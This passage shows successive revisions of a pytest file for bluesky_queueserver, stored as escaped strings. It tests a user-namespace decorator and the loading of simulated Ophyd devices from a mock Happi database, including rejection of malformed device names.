The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 
'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n_happi_json_db_1 = \"\"\"\n{\n \"det\": {\n \"_id\": \"det\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.DetWithCountTime\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"det\",\n \"type\": \"OphydItem\"\n },\n \"motor\": {\n \"_id\": \"motor\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoPosition\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor\",\n \"type\": \"OphydItem\"\n },\n \"motor1\": {\n \"_id\": \"motor1\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor1\",\n \"type\": \"OphydItem\"\n },\n \"tst_motor2\": {\n \"_id\": \"tst_motor2\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"tst_motor2\",\n \"type\": \"OphydItem\"\n },\n \"motor3\": {\n \"_id\": \"motor3\",\n \"active\": true,\n \"args\": [],\n \"device_class\": 
\"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n },\n \"motor3_duplicate_error\": {\n \"_id\": \"motor3\",\n \"active\": false,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n }\n}\n\"\"\"\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, 'sim_devices.json')\n path_ini = os.path.join(tmp_path, 'happi.ini')\n happi_ini_text = f'[DEFAULT]\\nbackend=json\\npath={path_json}'\n with open(path_ini, 'w') as f:\n f.write(happi_ini_text)\n with open(path_json, 'w') as f:\n f.write(json_devices)\n monkeypatch.setenv('HAPPI_CFG', path_ini)\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), ('det', 'motor'), {}, False,\n 'element .* is 
expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == 
set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-4": "import os\nimport inspect\nimport pytest\nfrom ._common import copy_default_profile_collection, patch_first_startup_file\nfrom bluesky_queueserver.manager.profile_tools import global_user_namespace, load_devices_from_happi\nfrom bluesky_queueserver.manager.profile_ops import load_profile_collection\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, 'dir_local_imports')\n fln_func = os.path.join(path_dir, 'file_func.py')\n fln_gen = os.path.join(path_dir, 'file_gen.py')\n os.makedirs(path_dir, exist_ok=True)\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, 'w') as f:\n f.writelines(code1)\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, 'w') as f:\n f.writelines(code2)\n\n\npatch_code = \"\"\"\nfrom dir_local_imports.file_func import f1, f1a\nfrom dir_local_imports.file_gen import f2, f2a\n\nfrom bluesky_queueserver.manager.profile_tools import 
set_user_ns\n\n@set_user_ns\ndef f4(some_value, user_ns, ipython):\n user_ns[\"value_f4\"] = some_value\n\nf4(90)\n\n\"\"\"\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, 'Failed to load the profile collection'\n assert 'f1' in nspace, 'Test for local imports failed'\n assert 'f2' in nspace, 'Test for local imports failed'\n assert inspect.isgeneratorfunction(nspace['f1']) is False\n assert inspect.isgeneratorfunction(nspace['f2']) is True\n\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert 'user_ns' not in params\n assert 'ipython' not in params\n check_signature(nspace['f1'])\n check_signature(nspace['f1a'])\n check_signature(nspace['f2'])\n check_signature(nspace['f2a'])\n assert nspace['value_f3'] == 91\n assert nspace['value_f4'] == 90\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-func'\n assert nspace['v_from_namespace'] == 'value-sent-to-func'\n result_func = nspace['f1'](60)\n assert nspace['func_was_called'] == 'func_was_called'\n assert result_func[0] == 60\n assert result_func[1] == 'value-sent-to-func'\n assert result_func[2] is False\n result_func = nspace['f1a'](65)\n assert nspace['func_A_was_called'] == 'func_was_called'\n assert result_func[0] == 65\n assert result_func[1] == 'value-sent-to-func'\n 
global_user_namespace.user_ns['v_from_namespace'] = 'value-sent-to-gen'\n result_func = list(nspace['f2'](110))[0]\n assert nspace['gen_was_called'] == 'gen_was_called'\n assert result_func[0] == 110\n assert result_func[1] == 'value-sent-to-gen'\n assert result_func[2] is False\n result_func = list(nspace['f2a'](115))[0]\n assert nspace['gen_A_was_called'] == 'gen_was_called'\n assert result_func[0] == 115\n assert result_func[1] == 'value-sent-to-gen'\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {'ab': 1, 'cd': 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n_happi_json_db_1 = \"\"\"\n{\n \"det\": {\n \"_id\": \"det\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.DetWithCountTime\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"det\",\n \"type\": \"OphydItem\"\n },\n \"motor\": {\n \"_id\": \"motor\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoPosition\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor\",\n \"type\": \"OphydItem\"\n },\n \"motor1\": {\n \"_id\": \"motor1\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor1\",\n \"type\": \"OphydItem\"\n },\n \"tst_motor2\": {\n \"_id\": \"tst_motor2\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n 
\"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"tst_motor2\",\n \"type\": \"OphydItem\"\n },\n \"motor3\": {\n \"_id\": \"motor3\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n },\n \"motor3_duplicate_error\": {\n \"_id\": \"motor3\",\n \"active\": false,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n }\n}\n\"\"\"\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, 'sim_devices.json')\n path_ini = os.path.join(tmp_path, 'happi.ini')\n happi_ini_text = f'[DEFAULT]\\nbackend=json\\npath={path_json}'\n with open(path_ini, 'w') as f:\n f.write(happi_ini_text)\n with open(path_json, 'w') as f:\n f.write(json_devices)\n monkeypatch.setenv('HAPPI_CFG', path_ini)\n\n\[email protected]('device_names, loaded_names, kw_args, success, errmsg'\n , [([], [], {}, True, ''), (('det', 'motor'), ('det', 'motor'), {}, \n True, ''), (['det', 'motor'], ('det', 'motor'), {}, True, ''), ((('det',\n ''), ['motor', '']), ('det', 'motor'), {}, True, ''), (('det', ['motor',\n '']), ('det', 'motor'), {}, True, ''), (('det', ('motor', ''), (\n 'tst_motor2', 'motor2')), ('det', 'motor', 'motor2'), {}, True, ''), ((\n ('motor1', 'motor1_copy1'), ('motor1', 'motor1_copy2')), (\n 'motor1_copy1', 'motor1_copy2'), {}, True, ''), (10, ('det', 'motor'),\n {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n ('string', ('det', 'motor'), {}, False,\n \"Parameter 'device_names' value must be a tuple or a list\"), (('det', \n 10), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"), ((\n 10, 'motor'), ('det', 'motor'), {}, False,\n \"Parameter 'device_names': 
element .* must be str, tuple or list\"), ((\n 'det', (10, 'motor2')), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2', 10\n )), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', ('tst_motor2',\n 'motor2', 10)), ('det', 'motor'), {}, False,\n 'element .* is expected to be in the form'), (('det', 'motor10'), (\n 'det', 'motor10'), {}, False, 'No devices with name'), (('det',\n 'motor3'), ('det', 'motor3'), {}, False, 'Multiple devices with name'),\n (('det', 'motor3'), ('det', 'motor3'), {'active': True}, True, ''), ((\n 'det', 'motor3'), ('det', 'motor3'), {'active': False}, False,\n \"No devices with name 'det' were found in Happi database.\"), (('motor3'\n ,), ('motor3',), {'active': False}, True, ''), (('det', ['motor',\n 'motor3_new']), ('det', 'motor3_new'), {}, True, ''), (('det', ['motor',\n 'Motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'moTor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '_motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n ' motor']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor ']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n 'motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers'), (('det', ['motor',\n '2motor_$new']), ('det', 'motor'), {}, False,\n 'may consist of lowercase letters, numbers')])\ndef test_load_devices_from_happi_1(tmp_path, monkeypatch, device_names,\n loaded_names, kw_args, success, errmsg):\n \"\"\"\n Tests for ``load_devices_from_happi``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, 
json_devices=_happi_json_db_1)\n if success:\n ns = {}\n dlist = load_devices_from_happi(device_names, namespace=ns, **kw_args)\n assert len(ns) == len(loaded_names), str(ns)\n for d in loaded_names:\n assert d in ns\n assert set(dlist) == set(loaded_names)\n else:\n with pytest.raises(Exception, match=errmsg):\n ns = {}\n load_devices_from_happi(device_names, namespace=ns, **kw_args)\n\n def _test_loading(device_names, loaded_names):\n if success:\n load_devices_from_happi(device_names, namespace=locals(), **kw_args\n )\n for d in loaded_names:\n assert d in locals()\n else:\n with pytest.raises(Exception, match=errmsg):\n load_devices_from_happi(device_names, namespace=locals(),\n **kw_args)\n _test_loading(device_names=device_names, loaded_names=loaded_names)\n\n\ndef test_load_devices_from_happi_2_fail(tmp_path, monkeypatch):\n \"\"\"\n Function ``load_devices_from_happi``: parameter ``namespace`` is required and must be of type ``dict``.\n \"\"\"\n _configure_happi(tmp_path, monkeypatch, json_devices=_happi_json_db_1)\n with pytest.raises(TypeError, match=\n \"missing 1 required keyword-only argument: 'namespace'\"):\n load_devices_from_happi(['det', 'motor'])\n with pytest.raises(TypeError, match=\n \"Parameter 'namespace' must be a dictionary\"):\n load_devices_from_happi(['det', 'motor'], namespace=[1, 2, 3])\n",
"step-5": "import os\nimport inspect\nimport pytest\n\nfrom ._common import copy_default_profile_collection, patch_first_startup_file\nfrom bluesky_queueserver.manager.profile_tools import global_user_namespace, load_devices_from_happi\nfrom bluesky_queueserver.manager.profile_ops import load_profile_collection\n\n\ndef create_local_imports_files(tmp_path):\n path_dir = os.path.join(tmp_path, \"dir_local_imports\")\n fln_func = os.path.join(path_dir, \"file_func.py\")\n fln_gen = os.path.join(path_dir, \"file_gen.py\")\n\n os.makedirs(path_dir, exist_ok=True)\n\n # Create file1\n code1 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f1(some_value, user_ns, ipython):\n user_ns[\"func_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f1a(some_value, user_ns):\n user_ns[\"func_A_was_called\"] = \"func_was_called\"\n return (some_value, user_ns[\"v_from_namespace\"])\n\n\"\"\"\n with open(fln_func, \"w\") as f:\n f.writelines(code1)\n\n # Create file2\n code2 = \"\"\"\nfrom bluesky_queueserver.manager.profile_tools import set_user_ns\n\n# Function that has the parameter 'ipython'\n@set_user_ns\ndef f2(some_value, user_ns, ipython):\n user_ns[\"gen_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"], bool(ipython))\n\n# Function that has no parameter 'ipython'\n@set_user_ns\ndef f2a(some_value, user_ns):\n user_ns[\"gen_A_was_called\"] = \"gen_was_called\"\n yield (some_value, user_ns[\"v_from_namespace\"])\n\n@set_user_ns\ndef f3(some_value, user_ns, ipython):\n user_ns[\"value_f3\"] = some_value\n\nf3(91)\n\n\"\"\"\n with open(fln_gen, \"w\") as f:\n f.writelines(code2)\n\n\npatch_code = \"\"\"\nfrom dir_local_imports.file_func import f1, f1a\nfrom dir_local_imports.file_gen import f2, f2a\n\nfrom 
bluesky_queueserver.manager.profile_tools import set_user_ns\n\n@set_user_ns\ndef f4(some_value, user_ns, ipython):\n user_ns[\"value_f4\"] = some_value\n\nf4(90)\n\n\"\"\"\n\n\ndef test_set_user_ns_1(tmp_path):\n \"\"\"\n Tests for ``set_user_ns`` decorator. The functionality of the decorator\n is fully tested (only without IPython):\n - using ``global_user_namespace`` to pass values in and out of the function\n defined in the imported module (emulation of ``get_ipython().user_ns``).\n - checking if the function is executed from IPython (only for the function\n defined in the imported module).\n \"\"\"\n pc_path = copy_default_profile_collection(tmp_path)\n\n create_local_imports_files(pc_path)\n patch_first_startup_file(pc_path, patch_code)\n\n nspace = load_profile_collection(pc_path)\n assert len(nspace) > 0, \"Failed to load the profile collection\"\n assert \"f1\" in nspace, \"Test for local imports failed\"\n assert \"f2\" in nspace, \"Test for local imports failed\"\n\n # Test if the decorator `set_user_ns` does not change function type\n assert inspect.isgeneratorfunction(nspace[\"f1\"]) is False\n assert inspect.isgeneratorfunction(nspace[\"f2\"]) is True\n\n # Check if the extra arguments are removed from the function signature\n def check_signature(func):\n params = inspect.signature(func).parameters\n assert \"user_ns\" not in params\n assert \"ipython\" not in params\n\n check_signature(nspace[\"f1\"])\n check_signature(nspace[\"f1a\"])\n check_signature(nspace[\"f2\"])\n check_signature(nspace[\"f2a\"])\n\n assert nspace[\"value_f3\"] == 91\n assert nspace[\"value_f4\"] == 90\n\n # Test function\n global_user_namespace.set_user_namespace(user_ns=nspace, use_ipython=False)\n global_user_namespace.user_ns[\"v_from_namespace\"] = \"value-sent-to-func\"\n assert nspace[\"v_from_namespace\"] == \"value-sent-to-func\"\n\n result_func = nspace[\"f1\"](60)\n assert nspace[\"func_was_called\"] == \"func_was_called\"\n assert result_func[0] == 60\n assert 
result_func[1] == \"value-sent-to-func\"\n assert result_func[2] is False\n\n result_func = nspace[\"f1a\"](65)\n assert nspace[\"func_A_was_called\"] == \"func_was_called\"\n assert result_func[0] == 65\n assert result_func[1] == \"value-sent-to-func\"\n\n # Test generator\n global_user_namespace.user_ns[\"v_from_namespace\"] = \"value-sent-to-gen\"\n result_func = list(nspace[\"f2\"](110))[0]\n assert nspace[\"gen_was_called\"] == \"gen_was_called\"\n assert result_func[0] == 110\n assert result_func[1] == \"value-sent-to-gen\"\n assert result_func[2] is False\n\n result_func = list(nspace[\"f2a\"](115))[0]\n assert nspace[\"gen_A_was_called\"] == \"gen_was_called\"\n assert result_func[0] == 115\n assert result_func[1] == \"value-sent-to-gen\"\n\n\ndef test_global_user_namespace():\n \"\"\"\n Basic test for ``global_user_namespace``.\n \"\"\"\n ns = {\"ab\": 1, \"cd\": 2}\n global_user_namespace.set_user_namespace(user_ns=ns)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n global_user_namespace.set_user_namespace(user_ns={}, use_ipython=True)\n assert global_user_namespace.user_ns == {}\n assert global_user_namespace.use_ipython is True\n\n global_user_namespace.set_user_namespace(user_ns=ns, use_ipython=False)\n assert global_user_namespace.user_ns == ns\n assert global_user_namespace.use_ipython is False\n\n\n_happi_json_db_1 = \"\"\"\n{\n \"det\": {\n \"_id\": \"det\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.DetWithCountTime\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"det\",\n \"type\": \"OphydItem\"\n },\n \"motor\": {\n \"_id\": \"motor\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoPosition\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor\",\n \"type\": \"OphydItem\"\n },\n \"motor1\": {\n \"_id\": \"motor1\",\n \"active\": true,\n \"args\": [],\n 
\"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor1\",\n \"type\": \"OphydItem\"\n },\n \"tst_motor2\": {\n \"_id\": \"tst_motor2\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxisNoHints\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"tst_motor2\",\n \"type\": \"OphydItem\"\n },\n \"motor3\": {\n \"_id\": \"motor3\",\n \"active\": true,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n },\n \"motor3_duplicate_error\": {\n \"_id\": \"motor3\",\n \"active\": false,\n \"args\": [],\n \"device_class\": \"ophyd.sim.SynAxis\",\n \"documentation\": null,\n \"kwargs\": {\n \"name\": \"{{name}}\"\n },\n \"name\": \"motor3\",\n \"type\": \"OphydItem\"\n }\n}\n\"\"\"\n\n\ndef _configure_happi(tmp_path, monkeypatch, json_devices):\n path_json = os.path.join(tmp_path, \"sim_devices.json\")\n path_ini = os.path.join(tmp_path, \"happi.ini\")\n\n happi_ini_text = f\"[DEFAULT]\\nbackend=json\\npath={path_json}\"\n\n with open(path_ini, \"w\") as f:\n f.write(happi_ini_text)\n\n with open(path_json, \"w\") as f:\n f.write(json_devices)\n\n monkeypatch.setenv(\"HAPPI_CFG\", path_ini)\n\n\n# fmt: off\[email protected](\"device_names, loaded_names, kw_args, success, errmsg\", [\n ([], [], {}, True, \"\"), # No devices are loaded if the list of devices is empty\n ((\"det\", \"motor\"), (\"det\", \"motor\"), {}, True, \"\"),\n ([\"det\", \"motor\"], (\"det\", \"motor\"), {}, True, \"\"),\n (((\"det\", \"\"), [\"motor\", \"\"]), (\"det\", \"motor\"), {}, True, \"\"),\n ((\"det\", [\"motor\", \"\"]), (\"det\", \"motor\"), {}, True, \"\"),\n ((\"det\", (\"motor\", \"\"), (\"tst_motor2\", \"motor2\")), (\"det\", \"motor\", \"motor2\"), {}, True, \"\"),\n # This is not typical use case, but the same 
device may be loaded multiple times\n # with different names if needed.\n (((\"motor1\", \"motor1_copy1\"), (\"motor1\", \"motor1_copy2\")), (\"motor1_copy1\", \"motor1_copy2\"), {}, True, \"\"),\n # Incorrect type of the device list\n (10, (\"det\", \"motor\"), {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n (\"string\", (\"det\", \"motor\"), {}, False, \"Parameter 'device_names' value must be a tuple or a list\"),\n # Incorrecty type or form of a device list element\n ((\"det\", 10), (\"det\", \"motor\"), {}, False, \"Parameter 'device_names': element .* must be str, tuple or list\"),\n ((10, \"motor\"), (\"det\", \"motor\"), {}, False,\n \"Parameter 'device_names': element .* must be str, tuple or list\"),\n ((\"det\", (10, \"motor2\")), (\"det\", \"motor\"), {}, False, \"element .* is expected to be in the form\"),\n ((\"det\", (\"tst_motor2\", 10)), (\"det\", \"motor\"), {}, False, \"element .* is expected to be in the form\"),\n ((\"det\", (\"tst_motor2\", \"motor2\", 10)), (\"det\", \"motor\"), {}, False,\n \"element .* is expected to be in the form\"),\n # No device found\n ((\"det\", \"motor10\"), (\"det\", \"motor10\"), {}, False, \"No devices with name\"),\n # Multiple devices found (search for \"motor3\" yields multile devices, this is database issue)\n ((\"det\", \"motor3\"), (\"det\", \"motor3\"), {}, False, \"Multiple devices with name\"),\n # Use additional search parameters. 
